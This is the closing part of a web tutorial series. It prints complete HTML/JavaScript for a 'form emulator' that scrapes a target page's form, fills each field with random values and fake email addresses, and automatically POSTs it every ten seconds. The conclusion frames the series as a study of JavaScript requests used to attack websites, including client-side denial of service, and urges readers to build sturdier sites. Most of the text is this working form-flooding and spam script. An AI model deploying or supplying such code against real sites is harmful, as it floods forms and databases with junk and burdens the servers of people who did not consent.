Programmatic POST Requests with JavaScript: Form Emulator in Action

To finish this tutorial, here is the full code for the form emulator script, including some basic (X)HTML markup and CSS declarations:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0
Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-
transitional.dtd">

<html>

<head>

<title>Post Http Requests with JavaScript</title>

<script type="text/javascript">

function getXMLHTTPObject(){

    //instantiate new XMLHttpRequest object

    var objhttp=(window.XMLHttpRequest)?new XMLHttpRequest
():new ActiveXObject('Microsoft.XMLHTTP');

    if(!objhttp){return};

    // assign event handler

    objhttp.onreadystatechange=displayStatus;

    // return XMLHttpRequest object

    return objhttp;

}

// function sendRequest

function sendRequest(url,data,method,mode,header){

    // set default values

    if(!url){url='default_url.htm'};

    if(!data){data='defaultdata=defaultvalue'};

    if(!method){method='post'};

    if(!mode){mode=true};

    if(!header){header='Content-Type:application/x-www-form-
urlencoded; charset=UTF-8'};

    // get XMLHttpRequest object

    objhttp=getXMLHTTPObject();

    // open socket connection

    objhttp.open(method,url,mode);

    // set http header

    objhttp.setRequestHeader(header.split(':')
[0],header.split(':')[1]);

    // send data

    objhttp.send(data);

}

// function displayStatus

function displayStatus(){

    // check XMLHttpRequest object status

    if(objhttp.readyState==4){

        // create paragraph elements

        var parStat=document.createElement('p');

        var parText=document.createElement('p');

        var parResp=document.createElement('p');

        // assign ID attributes

        parStat.id='status';

        parText.id='text';

        parResp.id='response';

        // append text nodes

        parStat.appendChild(document.createTextNode
('Status : '+objhttp.status));

        parText.appendChild(document.createTextNode('Status
text : '+objhttp.statusText));

        parResp.appendChild(document.createTextNode
('Document code : '+objhttp.responseText));

        // insert <p> elements into document tree

        document.body.appendChild(parStat);

        document.body.appendChild(parText);

        document.body.appendChild(parResp);

        // get form code

        getFormCode();

    }

}

// function getFormCode

function getFormCode(){

    // create <div> container

    var fdiv=document.createElement('div');

    // append <div> container into document tree

    document.body.appendChild(fdiv);

    // get page code

    var html=objhttp.responseText;

    // insert form code into document tree

    fdiv.innerHTML=html.substring(html.search
(/<form\b/),html.search(/<\/form>/));

    // hide form from being displayed

    fdiv.style.display='none';

}

// function getFormVariables

function getFormVariables(){

    var formvars='';

    var childElements=document.getElementsByTagName('form')
[0].childNodes;

    for(var i=0;i<childElements.length;i++){

        if(/(INPUT|TEXTAREA|SELECT)/.test(childElements[i].nodeName)){

                                   // check if field name contains the string 'email'     

                                    formvars+=(/mail/.test
(childElements[i].getAttribute('name')))?childElements
[i].getAttribute('name')+'='+getRandomEmail()
+'&':childElements[i].getAttribute('name')
+'='+getRandomValue()+'&';

        }

    }

    formvars=formvars.substring(0,formvars.length-1);

    return formvars;

}

// function getFormAction

function getFormAction(){

    var formaction=document.getElementsByTagName('form')
[0].getAttribute('action');

    if(!formaction){return};

    return formaction;

}

// function getRandomValue

function getRandomValue(){

    var chars='abcdefghiklmnopqrstuvwxyz0123456789';

    var rndstring='';

    var strlength=Math.floor(Math.random()*8)+2;

    for(var i=0;i<strlength;i++){

        var rndvalue=Math.floor(Math.random()*chars.length);

        rndstring+=chars.substring(rndvalue,rndvalue+1);

    }

    return rndstring;

}

// function getRandomEmail

function getRandomEmail(){

    return 'johndoe'+getRandomValue()+'@'+getRandomValue()+'.com';

}

window.onload=function(){

    if(document.getElementsByTagName&&document.createElement){

        // send first get request to form page

        sendRequest('post_form.htm','','get',false);

        // send post request every 10 seconds

        setInterval("sendRequest(getFormAction
(),getFormVariables(),'post',true);",10*1000);

    }

}

</script>

<style type="text/css">

h1 {

    font: bold 12px Arial, Helvetica, sans-serif;

    color: #000;

}

p {

    font: normal 11px Arial, Helvetica, sans-serif;

    color: #00f;

}

</style>

</head>

<body>

<h1>Emulating POST form submissions with JavaScript...</h1>

</body>

</html>

With reference to the above code, I’ve basically specified the script to be executed when the page has finished loading, as well as declared a couple of CSS styles for controlling the visual presentation of the information. Quite simple, isn’t it?

Conclusion

Over this series, I’ve offered wide-ranging coverage of the real implementation of JavaScript-based http requests as a growing form for attacking websites. The tutorials provided the basics of client-side denial of service attacks, as well as form emulation techniques.

Of course, due to the inherently insecure nature of the Internet, and specifically the Web, numerous attacking techniques are continuously emerging, so the methods described above are only a small piece within this conflictive scenario. Now that you’ve been warned, go and build more robust and safer Web programs.